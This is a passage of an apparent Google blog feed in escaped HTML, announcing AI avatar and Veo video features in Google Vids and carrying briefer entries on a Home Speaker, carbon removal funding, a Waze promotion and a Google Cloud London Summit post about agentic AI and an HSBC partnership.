    <content type="html">With the integration of Gemini 3.1 Flash Text-To-Speech (TTS) and the latest capabilities in Veo 3.1, AI avatars in &lt;a href="https://docs.google.com/videos/create?usp=blog" target="_blank"&gt;Google Vids&lt;/a&gt; have become more realistic and expressive than ever. We’re excited to announce expanded language support, a new collection of avatar defaults, and the ability to direct your custom avatars to take action in any generated video.&lt;div&gt;&lt;h4 style="text-align: left;"&gt;&lt;b&gt;Expanded preset avatars with more expressive speaking&lt;/b&gt;&lt;/h4&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7JULf7Ta3nwAy2x2tWoHkvEh6TAqfYSSK4sezJ5LqMJy3gtZIyLU5gIFeh3k8YtdlMzrs4WjRiSd4rMScxTZUvATJGhPSx15aLnViL03sPUyHsd2OKbHHa6IxHHz8I2KzBoSkygpUf7ftYoLaSVZZewxUYjANRyc-_tg6B5ambAvPpF2kcHlGjKI-cs9s/s1812/Realistic%20Preset%20Avatars.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="Several examples of realistic avatars" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7JULf7Ta3nwAy2x2tWoHkvEh6TAqfYSSK4sezJ5LqMJy3gtZIyLU5gIFeh3k8YtdlMzrs4WjRiSd4rMScxTZUvATJGhPSx15aLnViL03sPUyHsd2OKbHHa6IxHHz8I2KzBoSkygpUf7ftYoLaSVZZewxUYjANRyc-_tg6B5ambAvPpF2kcHlGjKI-cs9s/s16000/Realistic%20Preset%20Avatars.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw9oPDZztpNznL392ZGQAZMbqbAiq2I1NsznG9JFhHFVZVMGOD7PjDfrefqrvLzeqoNVMeoyPjymsiD7tvDBaZwJNX3L9MSpwt0jQTQUwAa2HgxOxYuk9baR2zZO1N5L6U27SA2Gg-w4yz5zGcQubtAUmI9xR1pYc0uhQB73KqSUX7ao2fiw8H3L3uNoEm/s1818/3D%20Cartoon%20Avatars.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="Several examples of 3D cartoon avatars" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw9oPDZztpNznL392ZGQAZMbqbAiq2I1NsznG9JFhHFVZVMGOD7PjDfrefqrvLzeqoNVMeoyPjymsiD7tvDBaZwJNX3L9MSpwt0jQTQUwAa2HgxOxYuk9baR2zZO1N5L6U27SA2Gg-w4yz5zGcQubtAUmI9xR1pYc0uhQB73KqSUX7ao2fiw8H3L3uNoEm/s16000/3D%20Cartoon%20Avatars.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;Samples of new default avatars&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;We’ve expanded avatar options from 23 to 53 default presets, spanning photorealistic, 3D cartoon, and graphic novel styles. This broader gallery includes avatars like Sofia, Jack, Charlie, Finley, and Eleanor, all powered by Gemini Audio to speak with greater degrees of expression, realism, and conversational tones.&lt;/div&gt;&lt;h4 style="text-align: left;"&gt;&lt;b&gt;Expanded speaker support to 24 languages&lt;/b&gt;&lt;/h4&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSWKfvvmhMXqtDYmm_EYza94qX2T3xfu7y7aWJjsR7fZl1Z2CHbl6dxVwmDacRIJFx22asXaQC162_tqfnGvODa0zuku5-c42wmEmQ_gl5jIp2wembGjQvWyU5wUvtmyb6LiH6c623NIa8A71TAekNLUL4yJWUTJo12gNQumsi5cBxWXiGLoLp1G2mR0HQ/s1126/Expanded%20Languages%20Avatars.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="List of supported languages" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSWKfvvmhMXqtDYmm_EYza94qX2T3xfu7y7aWJjsR7fZl1Z2CHbl6dxVwmDacRIJFx22asXaQC162_tqfnGvODa0zuku5-c42wmEmQ_gl5jIp2wembGjQvWyU5wUvtmyb6LiH6c623NIa8A71TAekNLUL4yJWUTJo12gNQumsi5cBxWXiGLoLp1G2mR0HQ/s16000/Expanded%20Languages%20Avatars.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;Full list of language support in Google Vids UI&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;We’ve added support for 16 new languages, including Hindi, Bengali, Marathi, Tamil, Telugu, Arabic, Indonesian, Russian, Dutch, Polish, Thai, Turkish, Vietnamese, Romanian, and Ukrainian. 

These languages join our existing set—English, Spanish, Portuguese, Japanese, Korean, French, Italian, and German—bringing the total to 24 supported languages for AI avatar and voiceovers.&lt;/div&gt;&lt;h4 style="text-align: left;"&gt;&lt;b&gt;Create custom avatars with the latest Gemini voice model&lt;/b&gt;&lt;/h4&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjubVXQf-9RPFKjAihjT40fkqmpdkG-pjJUnROPj4nCm17T7pJ3ppSCesfyKmAjAghGXrtCPAZWvr6MBY95LdYsvAi4V5GvKJqt2BU0Una9A9D42ejiVVf31m4Gkixao6hD-94fD8FwLWou4VDrrwynv1g-MoBm1E4_Kzbr8FW3vLRhGY_RawenOqYor0V2/s1966/Custom%20Avatars.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="UI for creating a custom avatar, including box to add a name" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjubVXQf-9RPFKjAihjT40fkqmpdkG-pjJUnROPj4nCm17T7pJ3ppSCesfyKmAjAghGXrtCPAZWvr6MBY95LdYsvAi4V5GvKJqt2BU0Una9A9D42ejiVVf31m4Gkixao6hD-94fD8FwLWou4VDrrwynv1g-MoBm1E4_Kzbr8FW3vLRhGY_RawenOqYor0V2/s16000/Custom%20Avatars.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;User experience of assigning new voices to custom avatars&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;With custom avatars in Vids, you can design your avatar using Nano Banana Pro. Starting today, you can choose from 30+ voices powered by Gemini Audio that offer increased expression, language support, and steering control over how they speak.&lt;/div&gt;&lt;h4 style="text-align: left;"&gt;&lt;b&gt;Direct your custom avatars to take action in addition to speaking&lt;/b&gt;&lt;/h4&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJEnM21jvs5XLEyP4-_cP_O07YCp1MJ8nDiaLWHNnVaCM8-IQgr3FEzuLjEi5-DlshaKKSPNjdzNP2umrd9hyphenhyphenTyp6CSQuf8aBB9YMdYButLnvm9jiWUoUkjEuJ6i8MCEkY7ntOTnTebJQXcTyR5oWqEvt3-EysxYk-DDUeGPzVqym5VMC9vYPP1k2_MTJO/s640/Direct%20Custom%20Avatars.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJEnM21jvs5XLEyP4-_cP_O07YCp1MJ8nDiaLWHNnVaCM8-IQgr3FEzuLjEi5-DlshaKKSPNjdzNP2umrd9hyphenhyphenTyp6CSQuf8aBB9YMdYButLnvm9jiWUoUkjEuJ6i8MCEkY7ntOTnTebJQXcTyR5oWqEvt3-EysxYk-DDUeGPzVqym5VMC9vYPP1k2_MTJO/s16000/Direct%20Custom%20Avatars.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;Generated sample of a directed custom avatar&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Previously, users could only direct default avatars. Now, you can add custom avatars as an ingredient in generated video clips, unlocking new ways to have your customized spokesperson tell your story. Every generation preserves your custom avatar's appearance and voice, ensuring your customizations are preserved throughout new generations.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Control custom actions: &lt;/b&gt;Instruct your avatar to walk, talk, and use objects simply by typing a text prompt describing their actions.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Use image references: &lt;/b&gt;Upload additional images to direct your avatar in customized locations or with branded logos.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;There is no admin control for these features.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users:&lt;/b&gt; Visit the Help Center to &lt;a href="https://support.google.com/docs/answer/16334946" target="_blank"&gt;learn more about using AI avatars in Vids&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains&lt;/a&gt;: Full rollout (1–3 days for feature visibility) starting on June 17, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Business: &lt;/b&gt;Business Starter, Standard, and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Enterprise: &lt;/b&gt;Enterprise Starter, Standard, and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education: &lt;/b&gt;Education Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Consumer: &lt;/b&gt;All users with personal Google accounts, including Google AI Pro and Ultra&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Editions: &lt;/b&gt;Enterprise Essentials, and Enterprise Essentials Plus; Nonprofits; Individual&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education Add-ons: &lt;/b&gt;Teaching and Learning; Google AI Pro for Education&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Add-ons: &lt;/b&gt;AI Expanded Access*&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;*Users with AI Expanded Access add-on licenses have &lt;a href="https://support.google.com/a/answer/14700766" target="_blank"&gt;higher limits&lt;/a&gt; on usage of AI avatars in Vids.&lt;/i&gt;&lt;/div&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Docs Editors Help: &lt;a href="https://support.google.com/docs/answer/16334946" target="_blank"&gt;Use AI avatars in Google Vids&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/enhanced-ai-avatars-vids.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-17T14:04:27+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/create-longer-veo-videos-and-generate-multiple-at-once-in-Google-Vids.html</id>
    <title>Create longer Veo videos and generate multiple at once in Google Vids</title>
    <updated>2026-06-17T14:02:33+00:00</updated>
    <content type="html">Starting today, we’re introducing powerful new ways to create and iterate on video content in &lt;a href="https://docs.google.com/videos/create?usp=blog" target="_blank"&gt;Google Vids&lt;/a&gt; using Veo. These updates provide all Vids users with the ability to create longer videos with consistent characters and generate multiple videos in parallel, enabling you to bring your vision to life faster than ever before.&lt;div&gt;&lt;br /&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Longer Veo videos:&lt;/b&gt; You can now extend existing video clips using Veo to create longer, more immersive content while ensuring perfect storytelling continuity across your scenes.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Generate multiple clips at once:&lt;/b&gt; Increase your productivity by kicking off multiple video generation requests at once, allowing you to explore different styles and prompts simultaneously to save time.&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCjVt6hpEvE_esuUE89ScxZZU4xNRoIxX0T25S9dxDd3k_wsyJUxE67mWAASoXawVjmEK6XOFOjipYQzwgm4OlcG7iukApXbZuWonZMwHssJLpGs8KZTLTqhW1qW-ZR7kieYF0PsNK20jc4lbNA7LZdWBAr32PsA-XYkAjPIpgGxLryqSrIBQRSE74HiIz/s1000/Veo%20Extension%20Vids.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCjVt6hpEvE_esuUE89ScxZZU4xNRoIxX0T25S9dxDd3k_wsyJUxE67mWAASoXawVjmEK6XOFOjipYQzwgm4OlcG7iukApXbZuWonZMwHssJLpGs8KZTLTqhW1qW-ZR7kieYF0PsNK20jc4lbNA7LZdWBAr32PsA-XYkAjPIpgGxLryqSrIBQRSE74HiIz/s16000/Veo%20Extension%20Vids.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;Extend video clips using Veo&lt;/i&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;There is no admin control for this feature.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;Visit the Help Center to &lt;a href="https://support.google.com/docs/answer/16143507" target="_blank"&gt;learn more about using AI to generate video clips in Vids&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains&lt;/a&gt;:&amp;nbsp;Full rollout (1–3 days for feature visibility) starting on June 17, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Business: &lt;/b&gt;Business Starter, Standard, and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Enterprise: &lt;/b&gt;Enterprise Starter, Standard, and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education: &lt;/b&gt;Education Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Consumer: &lt;/b&gt;All users with personal Google accounts, including Google AI Pro and Ultra&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Editions: &lt;/b&gt;Enterprise Essentials, and Enterprise Essentials Plus; Nonprofits; Individual&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education Add-ons: &lt;/b&gt;Teaching and Learning; Google AI Pro for Education&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Add-ons: &lt;/b&gt;AI Expanded Access*&lt;/li&gt;&lt;/ul&gt;&lt;i&gt;*Users with AI Expanded Access add-on licenses have &lt;a href="https://support.google.com/a/answer/14700766" target="_blank"&gt;higher limits&lt;/a&gt; on video generation using Veo in Vids.&lt;/i&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Docs Editors Help: &lt;a href="https://support.google.com/docs/answer/16143507" target="_blank"&gt;Use AI to generate video clips in Google Vids&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/create-longer-veo-videos-and-generate-multiple-at-once-in-Google-Vids.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-17T14:02:33+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/create-longer-veo-videos-and-generate-multiple-at-once-in-Google-Vids.html</id>
    <title>Create longer Veo videos and generate multiple at once in Google Vids</title>
    <updated>2026-06-17T14:02:33+00:00</updated>
    <content type="html">Starting today, we’re introducing powerful new ways to create and iterate on video content in &lt;a href="https://docs.google.com/videos/create?usp=blog" target="_blank"&gt;Google Vids&lt;/a&gt; using Veo. These updates provide all Vids users with the ability to create longer videos with consistent characters and generate multiple videos in parallel, enabling you to bring your vision to life faster than ever before.&lt;div&gt;&lt;br /&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Longer Veo videos:&lt;/b&gt; You can now extend existing video clips using Veo to create longer, more immersive content while ensuring perfect storytelling continuity across your scenes.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Generate multiple clips at once:&lt;/b&gt; Increase your productivity by kicking off multiple video generation requests at once, allowing you to explore different styles and prompts simultaneously to save time.&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCjVt6hpEvE_esuUE89ScxZZU4xNRoIxX0T25S9dxDd3k_wsyJUxE67mWAASoXawVjmEK6XOFOjipYQzwgm4OlcG7iukApXbZuWonZMwHssJLpGs8KZTLTqhW1qW-ZR7kieYF0PsNK20jc4lbNA7LZdWBAr32PsA-XYkAjPIpgGxLryqSrIBQRSE74HiIz/s1000/Veo%20Extension%20Vids.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCjVt6hpEvE_esuUE89ScxZZU4xNRoIxX0T25S9dxDd3k_wsyJUxE67mWAASoXawVjmEK6XOFOjipYQzwgm4OlcG7iukApXbZuWonZMwHssJLpGs8KZTLTqhW1qW-ZR7kieYF0PsNK20jc4lbNA7LZdWBAr32PsA-XYkAjPIpgGxLryqSrIBQRSE74HiIz/s16000/Veo%20Extension%20Vids.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;Extend video clips using Veo&lt;/i&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;There is no admin control for this feature.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;Visit the Help Center to &lt;a href="https://support.google.com/docs/answer/16143507" target="_blank"&gt;learn more about using AI to generate video clips in Vids&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains&lt;/a&gt;:&amp;nbsp;Full rollout (1–3 days for feature visibility) starting on June 17, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Business: &lt;/b&gt;Business Starter, Standard, and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Enterprise: &lt;/b&gt;Enterprise Starter, Standard, and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education: &lt;/b&gt;Education Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Consumer: &lt;/b&gt;All users with personal Google accounts, including Google AI Pro and Ultra&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Editions: &lt;/b&gt;Enterprise Essentials, and Enterprise Essentials Plus; Nonprofits; Individual&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education Add-ons: &lt;/b&gt;Teaching and Learning; Google AI Pro for Education&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Add-ons: &lt;/b&gt;AI Expanded Access*&lt;/li&gt;&lt;/ul&gt;&lt;i&gt;*Users with AI Expanded Access add-on licenses have &lt;a href="https://support.google.com/a/answer/14700766" target="_blank"&gt;higher limits&lt;/a&gt; on video generation using Veo in Vids.&lt;/i&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Docs Editors Help: &lt;a href="https://support.google.com/docs/answer/16143507" target="_blank"&gt;Use AI to generate video clips in Google Vids&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/create-longer-veo-videos-and-generate-multiple-at-once-in-Google-Vids.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-17T14:02:33+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/devices/google-nest/google-home-speaker-gemini-features/</id>
    <title>Meet the new Google Home Speaker, built for Gemini</title>
    <updated>2026-06-17T13:00:00+00:00</updated>
    <content type="html">Google Home Speaker</content>
    <link href="https://blog.google/products-and-platforms/devices/google-nest/google-home-speaker-gemini-features/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-17T13:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/outreach-and-initiatives/sustainability/frontier-funding-expansion/</id>
    <title>We’re expanding our support for breakthrough carbon removal technologies.</title>
    <updated>2026-06-17T13:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/serpentinite.max-600x600.format-webp.webp" /&gt;By renewing our support for Frontier, we are advancing a portfolio that tackles emissions at every timescale.</content>
    <link href="https://blog.google/company-news/outreach-and-initiatives/sustainability/frontier-funding-expansion/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-17T13:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/waze/waze-minions-and-monsters</id>
    <title>Drive with “Minions &amp; Monsters” on Waze.</title>
    <updated>2026-06-17T11:00:00+00:00</updated>
    <content type="html">Promotional banner for "Illumination's Minions &amp; Monsters" on Waze. The center text reads "Drive with ILLUMINATION'S minions &amp; monsters. Only In Theaters. on waze." On the right, three Minions hold vintage filmmaking gear, including a movie camera and a script. On the left, a giant purple monster tentacle wraps around a white film strip border, and a colorful cartoon train chugs along a blue track at the bottom. The background is a vibrant geometric grid of yellow, blue, and orange</content>
    <link href="https://blog.google/waze/waze-minions-and-monsters" rel="alternate"/>
    <category term="Waze"/>
    <published>2026-06-17T11:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/waze/waze-minions-and-monsters/</id>
    <title>Drive with “Minions &amp; Monsters” on Waze.</title>
    <updated>2026-06-17T11:00:00+00:00</updated>
    <content type="html">Promotional banner for "Illumination's Minions &amp; Monsters" on Waze. The center text reads "Drive with ILLUMINATION'S minions &amp; monsters. Only In Theaters. on waze." On the right, three Minions hold vintage filmmaking gear, including a movie camera and a script. On the left, a giant purple monster tentacle wraps around a white film strip border, and a colorful cartoon train chugs along a blue track at the bottom. The background is a vibrant geometric grid of yellow, blue, and orange</content>
    <link href="https://blog.google/waze/waze-minions-and-monsters/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-17T11:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/inside-google-cloud/london-summit-2026-uk-leads-agentic-enterprise-ai-infrastructure-data-cloud</id>
    <title>From AI potential to agentic reality: Driving the UK’s next chapter</title>
    <updated>2026-06-17T08:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The United Kingdom, and London in particular, continues to be one of the great hubs for AI development in Europe and the world. We’re home to Google DeepMind, of course, as well as significant AI unicorns — and Google Cloud customers — like &lt;/span&gt;&lt;a href="https://www.googlecloudpresscorner.com/2026-06-16-Ineffable-Intelligence-Selects-Google-Cloud-To-Power-Its-Superintelligence-Mission" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Ineffable Intelligence&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, which is today announcing an important partnership with us. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A year ago, we joined you for the London Summit to showcase &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/inside-google-cloud/london-summit-2025-gen-ai-agents-transforming-business-civil-service"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;the vast potential of generative AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, including a major investment in upskilling the UK civil service. Today, as we welcome our partners once again to the historic vaults of Tobacco Dock, that potential has become &lt;/span&gt;&lt;a href="https://cloud.google.com/transform/next-26-building-the-agentic-enterprise-industry-highlights"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;an industrial-scale reality&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. In my conversations with leaders across both Whitehall and The City, the focus has moved from chatbots and media experiments to full-production execution. This is &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/google-cloud-next/welcome-to-google-cloud-next26"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;the moment of the agentic enterprise&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, where we shift from systems that simply chat with us to systems that can reason, plan, and execute multi-step workflows.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This transition is the cornerstone of the UK’s projected &lt;/span&gt;&lt;a href="https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/ai-potential-uk/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;£400 billion economic boost from AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; by 2030. At Google Cloud, we are the only provider offering &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/compute/ai-infrastructure-at-next26"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;the full integrated stack&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; — custom silicon, frontier models, and planet-scale infrastructure — required to turn the Agentic Enterprise into a reality.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The new frontier of British enterprise and research&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The banking sector is a key proving ground for this shift. And &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;HSBC&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, one of the largest and most important financial institutions in the world, is showing the way. Today, we’re &lt;/span&gt;&lt;a href="https://www.googlecloudpresscorner.com/2026-06-17-HSBC-AND-GOOGLE-CLOUD-ANNOUNCE-TRANSFORMATIVE-AI-BANKING-PARTNERSHIP" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;announcing&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; a multi-year transformational partnership with HSBC to accelerate AI adoption across HSBC’s products and services globally. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;This new collaboration will further accelerate the shift towards AI-enabled ways of working across HSBC’s global operations. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;HSBC will work with Google Cloud and Google DeepMind engineering teams to collaborate on new AI-powered tools and programmes, with access to Google’s latest agentic AI capabilities – including Gemini models and the Gemini Enterprise Agent Platform. &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;The initial delivery focus on three areas: hyper‑personalised wealth management support, stronger financial crime risk management, and AI tools to enhance frontline/relationship manager client service&lt;/span&gt;&lt;/p&gt;
